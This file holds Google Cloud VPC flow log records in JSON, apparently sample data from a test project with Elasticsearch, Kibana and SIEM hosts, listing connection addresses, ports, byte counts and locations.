-{"insertId":"ut8lbrffooxz9","jsonPayload":{"bytes_sent":"281147","connection":{"dest_ip":"10.87.40.76","dest_port":33542,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxyr","jsonPayload":{"bytes_sent":"63590","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.537763242Z","packets_sent":"340","reporter":"DEST","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxyy","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.12","dest_port":34836,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"1ulp77rfdvho4g","jsonPayload":{"bytes_sent":"1239","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.0.2.165","src_port":59623},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"18","reporter":"DEST","rtt_msec":"233","src_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho5r","jsonPayload":{"bytes_sent":"63853","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"363","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho5k","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":33924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:20.634435179Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho55","jsonPayload":{"bytes_sent":"252397","connection":{"dest_ip":"203.0.113.134","dest_port":33534,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"260","reporter":"SRC","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho60","jsonPayload":{"bytes_sent":"205787","connection":{"dest_ip":"203.0.113.134","dest_port":33694,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"265","reporter":"SRC","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho49","jsonPayload":{"bytes_sent":"106409","connection":{"dest_ip":"203.0.113.58","dest_port":65263,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"607","reporter":"SRC","rtt_msec":"87","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho4t","jsonPayload":{"bytes_sent":"61242","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"356","reporter":"DEST","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho68","jsonPayload":{"bytes_sent":"248826","connection":{"dest_ip":"203.0.113.101","dest_port":49680,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"735","reporter":"SRC","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho5n","jsonPayload":{"bytes_sent":"1777","connection":{"dest_ip":"192.0.2.117","dest_port":33862,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho5l","jsonPayload":{"bytes_sent":"116845","connection":{"dest_ip":"203.0.113.58","dest_port":65321,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"594","reporter":"SRC","rtt_msec":"219","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho65","jsonPayload":{"bytes_sent":"4614","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"58","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho4b","jsonPayload":{"bytes_sent":"50379","connection":{"dest_ip":"192.0.2.177","dest_port":60112,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"130","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho4m","jsonPayload":{"bytes_sent":"200417","connection":{"dest_ip":"10.87.40.76","dest_port":33552,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"250","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho5t","jsonPayload":{"bytes_sent":"30233","connection":{"dest_ip":"203.0.113.134","dest_port":33524,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"37","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho50","jsonPayload":{"bytes_sent":"160693","connection":{"dest_ip":"10.87.40.76","dest_port":33548,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"237","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho63","jsonPayload":{"bytes_sent":"59903","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"353","reporter":"DEST","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho4r","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":33924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:20.634545217Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho4i","jsonPayload":{"bytes_sent":"129335","connection":{"dest_ip":"203.0.113.58","dest_port":65271,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"605","reporter":"SRC","rtt_msec":"89","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho5v","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":33862},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho5i","jsonPayload":{"bytes_sent":"75477","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65321},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"737","reporter":"DEST","rtt_msec":"219","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho5c","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"203.0.113.58","dest_port":65316,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"600","reporter":"SRC","rtt_msec":"86","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho5p","jsonPayload":{"bytes_sent":"1541638","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.101","src_port":49680},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"949","reporter":"DEST","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho4y","jsonPayload":{"bytes_sent":"755901","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60112},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"227","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho4o","jsonPayload":{"bytes_sent":"248715","connection":{"dest_ip":"203.0.113.134","dest_port":33558,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.394676451Z","packets_sent":"270","reporter":"SRC","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho5g","jsonPayload":{"bytes_sent":"69757","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65316},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"709","reporter":"DEST","rtt_msec":"86","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
